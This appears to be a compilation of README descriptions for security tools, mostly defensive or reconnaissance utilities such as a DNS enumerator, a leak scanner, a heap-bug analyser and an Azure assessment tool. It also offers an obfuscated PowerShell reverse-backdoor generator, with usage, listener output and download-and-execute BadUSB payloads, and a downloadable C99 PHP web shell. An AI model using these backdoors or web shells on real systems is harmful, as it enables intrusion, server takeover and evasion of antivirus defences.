Linux distribution sudo apt update sudo apt install dnsutils # Install dig for CentOS sudo yum install bind-utils # Install dig for macOS brew install dig" dir="auto">
# Update the package list and install dig for Debian-based Linux distribution 
sudo apt update
sudo apt install dnsutils

# Install dig for CentOS
sudo yum install bind-utils

# Install dig for macOS
brew install dig

Step 2. Finish The Instalation

To use the Email-Vulnerablity-Checker type the following commands in Terminal:

apt install git -y 
apt install dig -y
git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git
cd Email-Vulnerablity-Checker
chmod 777 spfvuln.sh

Run email vulnerablity checker by just typing:

./spfvuln.sh -h

Support

For Queries: Telegram
Contributions, issues, and feature requests are welcome!
Give a โ˜… if you like this project!



DNSrecon-gui - DNSrecon Tool With GUI For Kali Linux


DNSRecon is a DNS scanning and enumeration tool written in Python, which allows you to perform different tasks, such as enumeration of standard records for a defined domain (A, NS, SOA, and MX). Top-level domain expansion for a defined domain.

With this graph-oriented user interface, the different records of a specific domain can be observed, classified and ordered in a simple way.

Install

git clone https://github.com/micro-joan/dnsrecon-gui
cd dnsrecon-gui/
chmod +x run.sh
./run.sh

After executing the application launcher you need to have all the components installed, the launcher will check one by one, and in the case of not having any component installed it will show you the statement that you must enter to install it:


Use

When the tool is ready to use the same installer will give you a URL that you must put in the browser in a private window so every time you do a search you will have to open a new window in private or clear your browser cache to refresh the graphics.

Tools

Service Functions Status
Text2MindMap Convert text to mindmap
โœ…Free
dnsenum DNS information gathering
โœ…Free

My website:ย https://microjoan.com
My blog:ย https://darkhacking.es/
Buy me a coffee:ย https://www.buymeacoffee.com/microjoan

DISCLAIMER

Thisย toolkitย contains materials that can be potentially damaging or dangerous for social media. Refer to the laws in your province/country before accessing, using,or in any other way utilizing this in a wrong way.

This Tool is made for educational purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then Get the hell out of here!


Powershell-Backdoor-Generator - Obfuscated Powershell Reverse Backdoor With Flipper Zero And USB Rubber Ducky Payloads


Reverse backdoor written in Powershell and obfuscated with Python. Allowing the backdoor to have a new signature after every run. Also can generate auto run scripts for Flipper Zero and USB Rubber Ducky.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL convers ion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory

Features

  • Hak5 Rubber Ducky payload
  • Flipper Zero payload
  • Download Files from remote system
  • Fetch target computers public IP address
  • List local users
  • Find Intresting Files
  • Get OS Information
  • Get BIOS Information
  • Get Anti-Virus Status
  • Get Active TCP Clients
  • Checks for common pentesting software installed

Standard backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file in the current working directory will be created called backdoor.ps1

Bad USB/ USB Rubber Ducky attacks

When using any of these attacks you will be opening up a HTTP server hosting the backdoor. Once the backdoor is retrieved the HTTP server will be shutdown.

Payloads

  • Execute -- Execute the backdoor
  • BindAndExecute -- Place the backdoor in temp, bind the backdoor to startup and then execute it.

Flipper Zero Backdoor

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor.txt --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Place the text file you specified (e.g: powershell_backdoor.txt) into your flipper zero. When the payload is executed it will download and execute backdoor.ps1

Usb Rubber Ducky Backdoor

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

A file named inject.bin will be placed in your current working directory. Java is required for this feature. When the payload is executed it will download and execute backdoor.ps1

Backdoor Execution

Tested on Windows 11, Windows 10 and Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
โ”Œโ”€โ”€(drewใ‰ฟkali)-[/home/drew/Documents]
โ””โ”€PS> ./backdoor.ps1

To Do

  • Add Standard Backdoor
  • Find Writeable Directories
  • Get Windows Update Status

Output of 5 obfuscations/Runs

sha1:c7a5fa3e56640ce48dcc3e8d972e444d9cdd2306
sha1:b32dab7b26cdf6b9548baea6f3cfe5b8f326ceda
sha1:e49ab36a7ad6b9fc195b4130164a508432f347db
sha1:ba40fa061a93cf2ac5b6f2480f6aab4979bd211b
sha1:f2e43320403fb11573178915b7e1f258e7c1b3f0


Leaktopus - Keep Your Source Code Under Control

Keep your source code under control.

Key Features

  • Plug&Play - one line installation with Docker.

  • Scan various sources containing a set of keywords, e.g. ORGANIZATION-NAME.com.

    Currently supports:

    • GitHub
      • Repositories
      • Gists (coming soon)
    • Paste sites (e.g., PasteBin) (coming soon)
  • Filter results with a built-in heuristic engine.

  • Enhance results with IOLs (Indicators Of Leak):

    • Secrets in the found sources (including Git repos commits history):
    • URIs (Including indication of your organization's domains)
    • Emails (Including indication of your organization's email addresses)
    • Contributors
    • Sensitive keywords (e.g., canary token, internal domains)
  • Allows to ignore public sources, (e.g., "junk" repositories by web crawlers).

  • OOTB ignore list of common "junk" sources.

  • Acknowledge a leak, and only get notified if the source has been modified since the previous scan.

  • Built-in ELK to search for data in leaks (including full index of Git repositories with IOLs).

  • Notify on new leaks

    • MS Teams Webhook.
    • Slack Bot.
    • Cortex XSOARยฎ (by Palo Alto Networks) Integration (WIP).

Technology Stack

  • Fully Dockerized.
  • API-first Python Flask backend.
  • Decoupled Vue.js (3.x) frontend.
  • SQLite DB.
  • Async tasks with Celery + Redis queues.

Prerequisites

  • Docker-Compose

Installation

  • Clone the repository
  • Create a local .env file
    cd Leaktopus
    cp .env.example .env
  • Edit .env according to your local setup (see the internal comments).
  • Run Leaktopus
    docker-compose up -d
  • Initiate the installation sequence by accessing the installation API. Just open http://{LEAKTOPUS_HOST}:8000/api/install in your browser.
  • Check that the API is up and running at http://{LEAKTOPUS_HOST}:8000/up
  • The UI should be available at http://{LEAKTOPUS_HOST}:8080

Using Github App

In addition to the basic personal access token option, Leaktopus supports Github App authentication. Using Github App is recommended due to the increased rate limits.

  1. To use Github App authentication, you need to create a Github App and install it on your organization/account. See Github's documentation for more details.

  2. After creating the app, you need to set the following environment variables:

    • GITHUB_USE_APP=True
    • GITHUB_APP_ID
    • GITHUB_INSTALLATION_ID - The installation id can be found in your app installation.
    • GITHUB_APP_PRIVATE_KEY_PATH (defaults to /app/private-key.pem)
  3. Mount the private key file to the container (see docker-compose.yml for an example). ./leaktopus_backend/private-key.pem:/app/private-key.pem

* Note that GITHUB_ACCESS_TOKEN will be ignored if GITHUB_USE_APP is set to True.

Updating Leaktopus

If you wish to update your Leaktopus version (pulling a newer version), just follow the next steps.

  • Pull the latest version.
    git pull
  • Rebuild Docker images (data won't be deleted).
    # Force image recreation
    docker-compose up --force-recreate --build
  • Run the DB update by calling its API (should be required after some updates). http://{LEAKTOPUS_HOST}/api/updatedb

Results Filtering Heuristic Engine

The built-in heuristic engine is filtering the search results to reduce false positives by:

  • Content:
    • More than X emails containing non-organizational domains.
    • More than X URIs containing non-organizational domains.
  • Metadata:
    • More than X stars.
    • More than X forks.
  • Sources ignore list.

API Documentation

OpenAPI documentation is available in http://{LEAKTOPUS_HOST}:8000/apidocs.

Leaktopus Services

Service Port Mandatory/Optional
Backend (API) 8000 Mandatory
Backend (Worker) N/A Mandatory
Redis 6379 Mandatory
Frontend 8080 Optional
Elasticsearch 9200 Optional
Logstash 5000 Optional
Kibana 5601 Optional

The above can be customized by using a custom docker-compose.yml file.

Security Notes

As for now, Leaktopus does not provide any authentication mechanism. Make sure that you are not exposing it to the world, and doing your best to restrict access to your Leaktopus instance(s).

Contributing

Contributions are very welcomed.

Please follow our contribution guidelines and documentation.



C99Shell-PHP7 - PHP 7 And Safe-Build Update Of The Popular C99 Variant Of PHP Shell


C99Shell-PHP7

PHP 7 and safe-build Update of the popular C99 variant of PHP Shell.

c99shell.php v.2.0 (PHP 7) (25.02.2019) Updated by: PinoyWH1Z for PHP 7

About C99Shell

An excellent example of a web shell is the c99 variant, which is a PHP shell (most of them calls it malware) often uploaded to a vulnerable web application to give hackers an interface. The c99 shell lets the attacker take control of the processes of the Internet server, allowing him or her give commands on the server as the account under which the threat is operating. It lets the hacker upload, browse the file system, edit and view files, in addition, to deleting, moving them and changing permissions. Finding a c99 shell is an excellent way to identify a compromise on a system. The c99 shell is about 1500 lines long if packed and 4900+ if properly displayed, and some of its traits include showing security measures the web server may use, a file viewer that has permissions, a place w here the attacker can operate custom PHP code (PHP malware c99 shell).

There are different variants of the c99 shell that are being used today. This github release is an example of a relatively recent one. It has many signatures that can be utilized to write protective countermeasures.


About this release:

I've been using php shells as part of my Ethical Hacking activities. And I have noticed that most of the php shells that are downloadable online are encrypted with malicious codes and without you knowing, others also insert trackers so they can see where you placed your php shell at.

I've came up with an idea such as "what if I get the stable version of c99shell and reverse the encrypted codes, remove the malicious codes and release it to public for good." And yeah, I decided to do it, but I noticed that most of the servers now have upgraded their apache service to PHP 7, sadly, the codes that I have is for PHP 5.3 and below.

The good thing is.. only few lines of syntax are needed to be altered, so I did it.

Here you go mates, a clean and safe-build version of the most stable c99shell that I can see.

If ever you see more bugs, please create an issue or just fork it, update it and do a pull request so I can check it and update the codes for stabilization.

PS:

This is a widely used php shell by hackers, so don't freak out if your anti-virus/anti-malware detects this php file as malicious or treated as backdoor. Since you can see the codes in my re-released project, you can read all throughout the codes and inspect or even debug as much as you like.

Disclaimer:

I will NOT be held responsible for any unethical use of this hacking tool.

Official Release:

c99shell_v2.0.zip (Zip Password: PinoyWH1Z)



Darkdump2 - Search The Deep Web Straight From Your Terminal



About Darkdump (Recent Notice - 12/27/22)

Darkdump is a simple script written in Python3.11 in which it allows users to enter a search term (query) in the command line and darkdump will pull all the deep web sites relating to that query. Darkdump2.0 is here, enjoy!

Installation

  1. git clone https://github.com/josh0xA/darkdump
  2. cd darkdump
  3. python3 -m pip install -r requirements.txt
  4. python3 darkdump.py --help

Usage

Example 1: python3 darkdump.py --query programming
Example 2: python3 darkdump.py --query="chat rooms"
Example 3: python3 darkdump.py --query hackers --amount 12

  • Note: The 'amount' argument filters the number of results outputted

Usage With Increased Anonymity

Darkdump Proxy: python3 darkdump.py --query bitcoin -p

Menu


____ _ _
| \ ___ ___| |_ _| |_ _ _____ ___
| | | .'| _| '_| . | | | | . |
|____/|__,|_| |_,_|___|___|_|_|_| _|
|_|

Developed By: Josh Schiavone
https://github.com/josh0xA
joshschiavone.com
Version 2.0

usage: darkdump.py [-h] [-v] [-q QUERY] [-a AMOUNT] [-p]

options:
-h, --help show this help message and exit
-v, --version returns darkdump's version
-q QUERY, --query QUERY
the keyword or string you want to search on the deepweb
-a AMOUNT, --amount AMOUNT
the amount of results you want to retrieve (default: 10)
-p, --proxy use darkdump proxy to increase anonymity

Visual

Ethical Notice

The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Do not use darkdump to navigate websites that take part in any activity that is identified as illegal under the laws and regulations of your government. May God bless you all.

License

MIT License
Copyright (c) Josh Schiavone



Heap_Detective - The Simple Way To Detect Heap Memory Pitfalls In C++ And C


This tool uses the taint analysis technique for static analysis and aims to identify points of heap memory usage vulnerabilities in C and C++ languages. The tool uses a common approach in the first phase of static analysis, using tokenization to collect information.

The second phase has a different approach to common lessons of the legendary dragon book, yes the tool doesn't use AST or resources like LLVM following parsers' and standard tips. The approach present aims to study other ways to detect vulnerabilities, using custom vector structures and typical recursive traversal with ranking following taint point. So the result of the sum of these techniques is the Heap_detective.

The tool follows the KISS principle "Keep it simple, stupid!". There's more than one way to do a SAST tool, I know that. Yes, I thought to use graph database or AST, but this action cracked the KISS principle in the context of this project.

https://antonio-cooler.gitbook.io/coolervoid-tavern/detecting-heap-memory-pitfalls


Features

  • C and C++ tokenizer
  • List of heap static routes for each source with taint points for analysis
  • Analyser to detect double free vulnerability
  • Analyser to detect use after free vulnerability
  • Analyser to detect memory leak

To test, read the directory samplers to understand the context, so to run look that following:

$ git clone https://github.com/CoolerVoid/heap_detective

$ cd heap_detective

$ make
// to run
$ bin/heap_detective samplers/
note:
So don't try "$ cd bin; ./heap_detective"
first argv is a directory for recursive analysis

Note: tested in GCC 9 and 11

The first argument by command is a directory for recursive analysis. You can study bad practices in directory "samplers".

Future features

  • Analyser to detect off-by-one vulnerability
  • Analyser to detect wild pointer
  • Analyser to detect heap overflow vulnerability

Overview

Output example:




Collect action done

...::: Heap static route :::...
File path: samplers/example3.c
Func name: main
Var name: new
line: 10: array = new obj[100];
Sinks:
line: 10: array = new obj[100];
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example3.c
Func name: while
Var name: array
line: 27: array = malloc(1);
Sinks:
line: 27: array = malloc(1);
Taint: True
In Loop: false
line: 28: array=2;
Taint: false
In Loop: false
line: 30: array = malloc(3);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example5.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false< br/> line: 12: free(ch_ptr);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example1.c
Func name: main
Var name: buf1R1
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Sinks:
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
Taint: True
In Loop: false
line: 26: free(buf1R1);
Taint: True
In Loop: false
line: 30: if (buf1R1) {
Taint: false
In Loop: false
line: 31: free(buf1R1);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example2.c
Func name: main
Var name: ch_ptr
line: 7: ch_ptr=malloc(100);
Sinks:
line: 7: ch_ptr=malloc(100);
Taint: True
In Loop: false
line: 11: ch_ptr = 'A';
Taint: false
In Loop: True
line: 12: free(ch_ptr);
Taint: True
In Loop: True
line: 13: printf("%s\n", ch_pt r);
Taint: false
In Loop: True

...::: Heap static route :::...
File path: samplers/example4.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 13: ch_ptr = 'A';
Taint: false
In Loop: false
line: 14: free(ch_ptr);
Taint: True
In Loop: false
line: 15: printf("%s\n", ch_ptr);
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example6.c
Func name: main
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 11: free(ch_ptr);
Taint: True
In Loop: false
line: 13: ch_ptr = malloc(500);
Taint: True
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Fu nc name: special
Var name: ch_ptr
line: 8: ch_ptr = malloc(100);
Sinks:
line: 8: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 15: free(ch_ptr);
Taint: True
In Loop: false
line: 16: ch_ptr = malloc(500);
Taint: True
In Loop: false
line: 17: ch_ptr=NULL;
Taint: false
In Loop: false
line: 25: char *ch_ptr = NULL;
Taint: false
In Loop: false

...::: Heap static route :::...
File path: samplers/example7.c
Func name: main
Var name: ch_ptr
line: 27: ch_ptr = malloc(100);
Sinks:
line: 27: ch_ptr = malloc(100);
Taint: True
In Loop: false
line: 30: free(ch_ptr);
Taint: True
In Loop: false
line: 32: ch_ptr = malloc(500);
Taint: True
In Loop: false

>>-----> Memory leak analyser

...::: Memory leak analyser :::...
File path: samplers/example3.c
F unction name: main
memory leak found!
line: 10: array = new obj[100];

...::: Memory leak analyser :::...
File path: samplers/example3.c
Function name: while
memory leak found!
line: 27: array = malloc(1);
line: 28: array=2;
line: 30: array = malloc(3);

...::: Memory leak analyser :::...
File path: samplers/example5.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example1.c
Function name: main
memory leak found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Memory leak analyser :::...
File path: samplers/example2.c
Function name: main
memory leak found!
Maybe the function to liberate memory can be in a loo p context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Memory leak analyser :::...
File path: samplers/example6.c
Function name: main
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: special
memory leak found!
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Memory leak analyser :::...
File path: samplers/example7.c
Function name: main
memory leak found!
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);

>>-----> Start double free analyser

...::: Double free analys er :::...
File path: samplers/example5.c
Function name: main
Double free found!
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Double free analyser :::...
File path: samplers/example1.c
Function name: main
Double free found!
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Double free analyser :::...
File path: samplers/example2.c
Function name: main
Double free found!
Maybe the function to liberate memory can be in a loop context!
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

>>-----> Start use after free analyser

...::: Use after free analyser :::...
File path: samplers/example5.c
Function name: main
Use after free found
l ine: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 12: free(ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example1.c
Function name: main
Use after free found
line: 13: buf1R1 = (char *) malloc(BUFSIZER1);
line: 26: free(buf1R1);
line: 30: if (buf1R1) {
line: 31: free(buf1R1);

...::: Use after free analyser :::...
File path: samplers/example2.c
Function name: main
Use after free found
line: 7: ch_ptr=malloc(100);
line: 11: ch_ptr = 'A';
line: 12: free(ch_ptr);
line: 13: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example4.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 13: ch_ptr = 'A';
line: 14: free(ch_ptr);
line: 15: printf("%s\n", ch_ptr);

...::: Use after free analyser :::...
File path: samplers/example6.c
Function name: main
Use after free found
line: 8: ch_ptr = malloc(100);
line: 11: free(ch_ptr);
line: 13: ch_ptr = malloc(500);

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: special
Use after free found
line: 8: ch_ptr = malloc(100);
line: 15: free(ch_ptr);
line: 16: ch_ptr = malloc(500);
line: 17: ch_ptr=NULL;
line: 25: char *ch_ptr = NULL;

...::: Use after free analyser :::...
File path: samplers/example7.c
Function name: main
Use after free found
line: 27: ch_ptr = malloc(100);
line: 30: free(ch_ptr);
line: 32: ch_ptr = malloc(500);






Winevt_Logs_Analysis - Searching .Evtx Logs For Remote Connections


Simple script for the purpose of finding remote connections to Windows machine and ideally some public IPs. It checks for some EventIDs regarding remote logins and sessions.

You should pip install -r requirements.txt so the script can work and parse some of the .evtx files inside winevt folder.


The winevt/Logs folders and the script must have identical file path.

Execution Example

Result Example



EAST - Extensible Azure Security Tool - Documentation


Extensible Azure Security Tool (Later referred as E.A.S.T) is tool for assessing Azure and to some extent Azure AD security controls. Primary use case of EAST is Security data collection for evaluation in Azure Assessments. This information (JSON content) can then be used in various reporting tools, which we use to further correlate and investigate the data.


This tool is licensed under MIT license.




Collaborators

Release notes

  • Preview branch introduced

    Changes:

    • Installation now accounts for use of Azure Cloud Shell's updated version in regards to depedencies (Cloud Shell has now Node.JS v 16 version installed)

    • Checking of Databricks cluster types as per advisory

      • Audits Databricks clusters for potential privilege elevation - This control requires typically permissions on the databricks cluster"
    • Content.json is has now key and content based sorting. This enables doing delta checks with git diff HEAD^1 ยน as content.json has predetermined order of results

    ยนWord of caution, if want to check deltas of content.json, then content.json will need to be "unignored" from .gitignore exposing results to any upstream you might have configured.

    Use this feature with caution, and ensure you don't have public upstream set for the branch you are using this feature for

  • Change of programming patterns to avoid possible race conditions with larger datasets. This is mostly changes of using var to let in for await -style loops


Important

Current status of the tool is beta
  • Fixes, updates etc. are done on "Best effort" basis, with no guarantee of time, or quality of the possible fix applied
  • We do some additional tuning before using EAST in our daily work, such as apply various run and environment restrictions, besides formalizing ourselves with the environment in question. Thus we currently recommend, that EAST is run in only in test environments, and with read-only permissions.
    • All the calls in the service are largely to Azure Cloud IP's, so it should work well in hardened environments where outbound IP restrictions are applied. This reduces the risk of this tool containing malicious packages which could "phone home" without also having C2 in Azure.
      • Essentially running it in read-only mode, reduces a lot of the risk associated with possibly compromised NPM packages (Google compromised NPM)
      • Bugs etc: You can protect your environment against certain mistakes in this code by running the tool with reader-only permissions
  • Lot of the code is "AS IS": Meaning, it's been serving only the purpose of creating certain result; Lot of cleaning up and modularizing remains to be finished
  • There are no tests at the moment, apart from certain manual checks, that are run after changes to main.js and various more advanced controls.
  • The control descriptions at this stage are not the final product, so giving feedback on them, while appreciated, is not the focus of the tooling at this stage
  • As the name implies, we use it as tool to evaluate environments. It is not meant to be run as unmonitored for the time being, and should not be run in any internet exposed service that accepts incoming connections.
  • Documentation could be described as incomplete for the time being
  • EAST is mostly focused on PaaS resource, as most of our Azure assessments focus on this resource type
  • No Input sanitization is performed on launch params, as it is always assumed, that the input of these parameters are controlled. That being said, the tool uses extensively exec() - While I have not reviewed all paths, I believe that achieving shellcode execution is trivial. This tool does not assume hostile input, thus the recommendation is that you don't paste launch arguments into command line without reviewing them first.

Tool operation

Depedencies

To reduce amount of code we use the following depedencies for operation and aesthetics are used (Kudos to the maintainers of these fantastic packages)

package aesthetics operation license
axios
โœ…
MIT
yargs
โœ…
MIT
jsonwebtoken
โœ…
MIT
chalk
โœ…
MIT
js-beautify
โœ…
MIT

Other depedencies for running the tool: If you are planning to run this in Azure Cloud Shell you don't need to install Azure CLI:

  • This tool does not include or distribute Microsoft Azure CLI, but rather uses it when it has been installed on the source system (Such as Azure Cloud Shell, which is primary platform for running EAST)

Azure Cloud Shell (BASH) or applicable Linux Distro / WSL

Requirement description Install
โœ…
AZ CLI
AZCLI USE curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
โœ…
Node.js runtime 14
Node.js runtime for EAST install with NVM

Controls

EAST provides three categories of controls: Basic, Advanced, and Composite

The machine readable control looks like this, regardless of the type (Basic/advanced/composite):

{
"name": "fn-sql-2079",
"resource": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourcegroups/rg-fn-2079/providers/microsoft.web/sites/fn-sql-2079",
"controlId": "managedIdentity",
"isHealthy": true,
"id": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourcegroups/rg-fn-2079/providers/microsoft.web/sites/fn-sql-2079",
"Description": "\r\n Ensure The Service calls downstream resources with managed identity",
"metadata": {
"principalId": {
"type": "SystemAssigned",
"tenantId": "033794f5-7c9d-4e98-923d-7b49114b7ac3",
"principalId": "cb073f1e-03bc-440e-874d-5ed3ce6df7f8"
},
"roles": [{
"role": [{
"properties": {
"roleDefinitionId": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/providers/Microsoft.Authorization/roleDefinitions/b24988ac-6180-42a0-ab88-20f7382dd24c",
"principalId": "cb073f1e-03b c-440e-874d-5ed3ce6df7f8",
"scope": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourceGroups/RG-FN-2079",
"createdOn": "2021-12-27T06:03:09.7052113Z",
"updatedOn": "2021-12-27T06:03:09.7052113Z",
"createdBy": "4257db31-3f22-4c0f-bd57-26cbbd4f5851",
"updatedBy": "4257db31-3f22-4c0f-bd57-26cbbd4f5851"
},
"id": "/subscriptions/6193053b-408b-44d0-b20f-4e29b9b67394/resourceGroups/RG-FN-2079/providers/Microsoft.Authorization/roleAssignments/ada69f21-790e-4386-9f47-c9b8a8c15674",
"type": "Microsoft.Authorization/roleAssignments",
"name": "ada69f21-790e-4386-9f47-c9b8a8c15674",
"RoleName": "Contributor"
}]
}]
},
"category": "Access"
},

Basic

Basic controls include checks on the initial ARM object for simple "toggle on/off"- boolean settings of said service.

Example: Azure Container Registry adminUser

acr_adminUser


Portal EAST

if (item.properties?.adminUserEnabled == false ){returnObject.isHealthy = true }

Advanced

Advanced controls include checks beyond the initial ARM object. Often invoking new requests to get further information about the resource in scope and it's relation to other services.

Example: Role Assignments

Besides checking the role assignments of subscription, additional check is performed via Azure AD Conditional Access Reporting for MFA, and that privileged accounts are not only protected by passwords (SPN's with client secrets)

Example: Azure Data Factory

ADF_pipeLineRuns

Azure Data Factory pipeline mapping combines pipelines -> activities -> and data targets together and then checks for secrets leaked on the logs via run history of the said activities.



Composite

Composite controls combines two or more control results from pipeline, in order to form one, or more new controls. Using composites solves two use cases for EAST

  1. You cant guarantee an order of control results being returned in the pipeline
  2. You need to return more than one control result from single check

Example: composite_resolve_alerts

  1. Get alerts from Microsoft Cloud Defender on subscription check
  2. Form new controls per resourceProvider for alerts

Reporting

EAST is not focused to provide automated report generation, as it provides mostly JSON files with control and evaluation status. The idea is to use separate tooling to create reports, which are fairly trivial to automate via markdown creation scripts and tools such as Pandoc

  • While focus is not on the reporting, this repo includes example automation for report creation with pandoc to ease reading of the results in single document format.

While this tool does not distribute pandoc, it can be used when creation of the reports, thus the following citation is added: https://github.com/jgm/pandoc/blob/master/CITATION.cff

cff-version: 1.2.0
title: Pandoc
message: "If you use this software, please cite it as below."
type: software
url: "https://github.com/jgm/pandoc"
authors:
- given-names: John
family-names: MacFarlane
email: jgm@berkeley.edu
orcid: 'https://orcid.org/0000-0003-2557-9090'
- given-names: Albert
family-names: Krewinkel
email: tarleb+github@moltkeplatz.de
orcid: '0000-0002-9455-0796'
- given-names: Jesse
family-names: Rosenthal
email: jrosenthal@jhu.edu

Running EAST scan

This part has guide how to run this either on BASH@linux, or BASH on Azure Cloud Shell (obviously Cloud Shell is Linux too, but does not require that you have your own linux box to use this)

โš ๏ธIf you are running the tool in Cloud Shell, you might need to reapply some of the installations again as Cloud Shell does not persist various session settings.

Fire and forget prerequisites on cloud shell

curl -o- https://raw.githubusercontent.com/jsa2/EAST/preview/sh/initForuse.sh | bash;

jump to next step

Detailed Prerequisites (This is if you opted no to do the "fire and forget version")

Prerequisites

git clone https://github.com/jsa2/EAST --branch preview
cd EAST;
npm install

Pandoc installation on cloud shell

# Get pandoc for reporting (first time only)
wget "https://github.com/jgm/pandoc/releases/download/2.17.1.1/pandoc-2.17.1.1-linux-amd64.tar.gz";
tar xvzf "pandoc-2.17.1.1-linux-amd64.tar.gz" --strip-components 1 -C ~

Installing pandoc on distros that support APT

# Get pandoc for reporting (first time only)
sudo apt install pandoc

Login Az CLI and run the scan

# Relogin is required to ensure token cache is placed on session on cloud shell

az account clear
az login

#
cd EAST
# replace the subid below with your subscription ID!
subId=6193053b-408b-44d0-b20f-4e29b9b67394
#
node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId


Generate report

cd EAST; node templatehelpers/eastReports.js --doc

  • If you want to include all Azure Security Benchmark results in the report

cd EAST; node templatehelpers/eastReports.js --doc --asb

Export report from cloud shell

pandoc -s fullReport2.md -f markdown -t docx --reference-doc=pandoc-template.docx -o fullReport2.docx


Azure Devops (Experimental) There is Azure Devops control for dumping pipeline logs. You can specify the control run by following example:

node ./plugins/main.js --batch=10 --nativescope=true --roleAssignments=true --helperTexts=true --checkAad=true --scanAuditLogs --composites --subInclude=$subId --azdevops "organizationName"

Licensing

Community use

  • Share relevant controls across multiple environments as community effort

Company use

  • Companies have possibility to develop company specific controls which apply to company specific work. Companies can then control these implementations by decision to share, or not share them based on the operating principle of that company.

Non IPR components

  • Code logic and functions are under MIT license. since code logic and functions are alredy based on open-source components & vendor API's, it does not make sense to restrict something that is already based on open source

If you use this tool as part of your commercial effort we only require, that you follow the very relaxed terms of MIT license

Read license

Tool operation documentation

Principles

AZCLI USE

Existing tooling enhanced with Node.js runtime

Use rich and maintained context of Microsoft Azure CLI login & commands with Node.js control flow which supplies enhanced rest-requests and maps results to schema.

